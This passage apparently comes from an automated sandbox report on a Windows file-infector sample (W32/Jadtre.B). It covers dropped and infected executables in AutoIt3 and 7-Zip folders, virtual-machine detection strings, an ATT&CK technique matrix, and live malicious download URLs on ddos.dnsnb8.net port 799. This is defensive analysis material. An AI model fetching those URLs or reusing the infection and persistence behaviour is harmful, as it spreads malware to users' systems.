    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_004074EE push 0042BE47h; ret 1_2_004074F4
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_004048F8 push 00404966h; ret 1_2_00404908
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_004158FE push 00420E3Ch; ret 1_2_00415907
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00405098 push ecx; ret 1_2_0040509B
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_004018B1 push 0040CC1Bh; ret 1_2_004018BD
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_004054B4 push 004294D3h; ret 1_2_004054CD
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_0040CD41 push 00409805h; ret 1_2_0040CD5E
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00402142 push 0043780Dh; ret 1_2_00402BD0
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00407542 push 0042086Ch; ret 1_2_00407564
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00405145 push 00413471h; ret 1_2_00405159
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00402548 push 0042B124h; ret 1_2_0040254E
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00403156 push 0042FB70h; ret 1_2_00403163
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00402163 push 0040E9AFh; ret 1_2_0042FDA6
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_0041A96D push 0041AC46h; ret 1_2_0041A976
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_0041357E push 0042DAAFh; ret 1_2_004135B1
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_0040217F push 0040D680h; ret 1_2_00402184
    Source: biKy3nZEyJ.exeStatic PE information: section name: A#uq entropy: 6.934503720718857
    Source: TJytnf.exe.1.drStatic PE information: section name: .text entropy: 7.81169422100848
    Source: Uninstall.exe.5.drStatic PE information: section name: EpNuZ entropy: 6.934594543260334
    Source: MyProg.exe.5.drStatic PE information: section name: Y|uR entropy: 6.934093080731921
    Source: SciTE.exe.5.drStatic PE information: section name: u entropy: 6.934667299067817

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeFile created: C:\Users\user\AppData\Local\Temp\TJytnf.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 799
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-1062
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeAPI coverage: 9.4 %
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 5_2_00F71718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00F71754h5_2_00F71718
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 5_2_00F729E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,5_2_00F729E2
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 5_2_00F72B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,5_2_00F72B8C
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
    Source: Amcache.hve.5.drBinary or memory string: VMware
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
    Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
    Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeAPI call chain: ExitProcess graph end nodegraph_5-1037
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00740044 mov eax, dword ptr fs:[00000030h]1_2_00740044
    Source: SciTE.exe.5.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_004035A2 cpuid 1_2_004035A2
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 5_2_00F71718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,5_2_00F71718
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 5_2_00F7139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,5_2_00F7139F
    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: TJytnf.exe PID: 3044, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: TJytnf.exe PID: 3044, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    11
    Input Capture
    11
    System Time Discovery
    1
    Taint Shared Content
    11
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts2
    Process Injection
    1
    Access Token Manipulation
    LSASS Memory11
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    2
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
    Obfuscated Files or Information
    NTDS3
    File and Directory Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing
    LSA Secrets13
    System Information Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    biKy3nZEyJ.exe100%AviraW32/Jadtre.B
    biKy3nZEyJ.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Users\user\AppData\Local\Temp\TJytnf.exe100%AviraTR/Dldr.Small.Z.haljq
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\TJytnf.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://www.scintilla.org/scite.rng0%URL Reputationsafe
    http://www.rftp.comJosiah0%URL Reputationsafe
    http://www.activestate.com0%URL Reputationsafe
    http://www.activestate.comHolger0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    http://www.rftp.com0%URL Reputationsafe
    http://www.baanboard.comBrendon0%URL Reputationsafe
    https://www.smartsharesystems.com/0%URL Reputationsafe
    http://www.scintilla.org0%URL Reputationsafe
    http://www.spaceblue.comMathias0%URL Reputationsafe
    https://www.smartsharesystems.com/Morten0%URL Reputationsafe
    http://www.develop.com0%URL Reputationsafe
    http://www.lua.org0%URL Reputationsafe
    http://ddos.dnsnb8.net:799/cj//k1.rar?100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
    http://ddos.dnsnb8.net/ava100%Avira URL Cloudmalware
    http://www.spaceblue.com0%URL Reputationsafe
    http://ddos.dnsnb8.net:799/cj//k2.rarC:100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k2.rarmples100%Avira URL Cloudmalware
    http://www.baanboard.com0%URL Reputationsafe
    http://www.develop.comDeepak0%URL Reputationsafe
    http://ddos.dnsnb8.net:799/cj//k2.rar%100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k2.rar86)100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rars100%Avira URL Cloudphishing
    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rar100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarp100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net/Pt100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k1.rar0100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k1.rarp100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k1.rarbC:100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rar%100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k1.rar(100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://ddos.dnsnb8.net:799/cj//k2.rartrue
      • Avira URL Cloud: malware
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rartrue
      • URL Reputation: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://ddos.dnsnb8.net/avaTJytnf.exe, 00000005.00000002.1847735199.00000000014AF000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rar?TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://www.scintilla.org/scite.rngSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://www.rftp.comJosiahSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rarmplesTJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rar86)TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://www.activestate.comSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://www.activestate.comHolgerSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rarsTJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rarC:TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DETJytnf.exe, 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmp, TJytnf.exe, 00000005.00000003.1270045728.0000000001360000.00000004.00001000.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://upx.sf.netAmcache.hve.5.drfalse
      • URL Reputation: safe
      unknown
      http://www.rftp.comSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rar%TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rarpTJytnf.exe, 00000005.00000002.1848086577.000000000309A000.00000004.00000010.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://www.baanboard.comBrendonSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      https://www.smartsharesystems.com/SciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://www.scintilla.orgSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://www.spaceblue.comMathiasSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net/PtTJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      https://www.smartsharesystems.com/MortenSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://www.develop.comSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://www.lua.orgSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://www.spaceblue.comSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rar0TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rarpTJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://www.baanboard.comSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rarbC:TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://www.develop.comDeepakSciTE.exe.5.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rar(TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rar%TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
